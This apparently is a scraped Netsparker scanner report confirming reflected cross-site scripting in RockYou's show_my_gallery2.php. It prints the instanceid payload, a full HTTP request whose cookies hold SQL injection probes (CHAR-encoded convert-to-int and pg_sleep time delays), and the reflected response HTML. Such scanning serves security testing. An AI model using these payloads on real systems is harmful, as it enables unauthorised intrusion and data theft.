href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=&#039;+netsparker(9)+&#039;", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=&#039;+netsparker(9)+&#039;&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">REPORT</a></td>
</tr></table>
<div id="..
|
- /show_my_gallery2.php
/show_my_gallery2.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| instanceid | GET | '+alert(9)+' |
Request
GET /show_my_gallery2.php?lang=en&instanceid='%2Bnetsparker(9)%2B' HTTP/1.1
Referer: http://www.rockyou.com/show_my_gallery.php?lang=en&instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166051; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/show_my_gallery.php?lang=en&instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166051; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:34:11 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:34:10 GMT; path=/; domain=.rockyou.com,lastlogin=1303166051; expires=Wed, 27-Jul-2011 22:34:11 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:34:11 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=272756 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9843
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid='+netsparker(9)+'"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=&#039;+netsparker(9)+&#039;", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=&#039;+netsparker(9)+&#039;&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">REPORT</a></td>
</tr></table>
<div id="ajaxarea" style="width:450px; height:100px; background: #f51768; margin: 10px auto" >
<div id="sharePagelet" style="padding: 10..
Date: Mon, 18 Apr 2011 22:34:11 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:34:10 GMT; path=/; domain=.rockyou.com,lastlogin=1303166051; expires=Wed, 27-Jul-2011 22:34:11 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:34:11 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=272756 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9843
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" 